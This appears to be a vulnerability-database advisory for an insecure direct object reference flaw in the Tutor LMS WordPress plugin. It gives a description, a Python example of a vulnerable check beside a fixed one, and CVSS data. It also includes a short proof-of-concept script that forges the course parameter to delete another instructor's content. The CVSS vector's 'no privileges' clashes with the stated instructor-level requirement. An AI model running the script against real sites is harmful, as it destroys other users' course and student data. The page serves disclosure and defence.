Security Vulnerability Report
CVE-2026-6965 CVSS 5.3 MEDIUM

CVE-2026-6965

Published: 2026-05-13 06:16:15
Last Modified: 2026-05-13 14:43:47

Description

The Tutor LMS – eLearning and online course solution plugin for WordPress is vulnerable to Insecure Direct Object Reference in versions up to and including 3.9.9. This is due to the `get_course_id_by()` function unconditionally trusting the user-supplied `course` GET parameter as the authoritative course ID for content ownership lookups, which is then consumed by `can_user_manage()`, the plugin's sole authorization gate for instructor-level operations, causing it to evaluate instructor membership against the attacker-controlled course rather than the course that actually owns the target content object. This makes it possible for authenticated attackers, with instructor-level access and above, to perform unauthorized operations on any other instructor's course content, including permanently deleting lessons, assignments, quizzes (with cascading deletion of all student attempt data), topics, announcements, and Q&A threads, as well as creating or modifying lessons, topics, and announcements in victim courses, manipulating student quiz grades, and reading unpublished lesson and quiz content.
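The authorization pattern the description refers to, as an added example that is not part of this advisory or of the Tutor LMS code base: a check that trusts the request's `course` value (the reported flaw) beside a hardened check that derives the owning course from the stored content object's parent chain. Every name, the in-memory content tree and the instructor table below are constructed for this illustration; the plugin's real helpers are `get_course_id_by()` and `can_user_manage()`.

```python
from dataclasses import dataclass
from typing import Dict, Optional, Set


@dataclass
class ContentItem:
    """A stored course object; parent_id links a lesson to its topic and a topic to its course."""
    item_id: int
    kind: str                 # "course", "topic", "lesson", "quiz", ...
    parent_id: Optional[int]


# Constructed sample data: course 10 belongs to "attacker"; course 20, with topic 30
# and lesson 55 under it, belongs to "victim".
ITEMS: Dict[int, ContentItem] = {
    10: ContentItem(10, "course", None),
    20: ContentItem(20, "course", None),
    30: ContentItem(30, "topic", 20),
    55: ContentItem(55, "lesson", 30),
}
INSTRUCTORS: Dict[int, Set[str]] = {10: {"attacker"}, 20: {"victim"}}


def course_id_of(item_id: int) -> Optional[int]:
    """Resolve the owning course by walking the stored parent chain, never from the request."""
    item = ITEMS.get(item_id)
    seen = set()
    while item is not None and item.kind != "course":
        if item.item_id in seen:          # corrupted or cyclic chain: refuse rather than guess
            return None
        seen.add(item.item_id)
        item = ITEMS.get(item.parent_id)
    return item.item_id if item is not None else None


def is_instructor(user: str, course_id: int) -> bool:
    return user in INSTRUCTORS.get(course_id, set())


def can_manage_vulnerable(user: str, request_course: Optional[int], target_id: int) -> bool:
    """The reported flaw: membership is checked against the course named in the request,
    so the target object's real owner never enters the decision."""
    return request_course is not None and is_instructor(user, request_course)


def can_manage_fixed(user: str, request_course: Optional[int], target_id: int) -> bool:
    """Hardened check: the course comes from the target object itself; a client-supplied
    course is at most a hint that must agree with the stored owner."""
    owner = course_id_of(target_id)
    if owner is None:                     # unknown object: deny by default
        return False
    if request_course is not None and request_course != owner:
        return False                      # request disagrees with stored ownership
    return is_instructor(user, owner)
```

With the sample tree, the vulnerable check lets "attacker" manage lesson 55 by naming course 10, while the fixed check denies it and still allows the course's own instructor.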

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Tutor LMS <= 3.9.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Configuration
target_url = "http://example.com/wp-admin/admin-ajax.php"
attacker_cookie = "wordpress_logged_in_xxx=attacker_session_id"

# Scenario: Attacker wants to delete a lesson (lesson_id=55) belonging to another instructor.
# The attacker controls course_id=10 (where they have instructor privileges).
# The vulnerability allows passing course_id=10 in the GET parameter to pass the check,
# while the POST body targets lesson_id=55.
payload = {
    "action": "tutor_delete_topic",  # Example action
    "topic_id": 55,  # Target content ID belonging to victim
}

# Malicious GET parameters to bypass can_user_manage()
params = {
    "course": 10  # Attacker's controlled course ID
}

headers = {
    "Cookie": attacker_cookie,
    "Content-Type": "application/x-www-form-urlencoded",
}

response = requests.post(target_url, data=payload, params=params, headers=headers)
if response.status_code == 200:
    print("[+] Exploit successful! Target content likely deleted.")
else:
    print("[-] Exploit failed.")
```

Weakness

CWE-639

References

Source locations cited for Tutor LMS tag 3.9.7:
https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.7/classes/Ajax.php#L294
https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.7/classes/Ajax.php#L507
https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.7/classes/Ajax.php#L586
https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.7/classes/Announcements.php#L105
https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.7/classes/Course.php#L1997
https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.7/classes/Course.php#L2045
https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.7/classes/Lesson.php#L186
https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.7/classes/Lesson.php#L243
https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.7/classes/Lesson.php#L341
https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.7/classes/Q_And_A.php#L219
https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.7/classes/Q_And_A.php#L297
https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.7/classes/Q_And_A.php#L339
https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.7/classes/Quiz.php#L1007
https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.7/classes/Quiz.php#L1041
https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.7/classes/Quiz.php#L888
https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.7/classes/Utils.php#L7829
https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.7/classes/Utils.php#L8020

Source locations cited for Tutor LMS tag 3.9.9 (partial; the record is truncated after this point):
https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.9/classes/Ajax.php#L294
https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.9/classes/Ajax.php#L507
https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.9/classes/Ajax.php#L586
https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.9/classes/Announcements.php#L105
https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.9/classes/Course.php#L1997
https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.9/classes/Course.php#L2045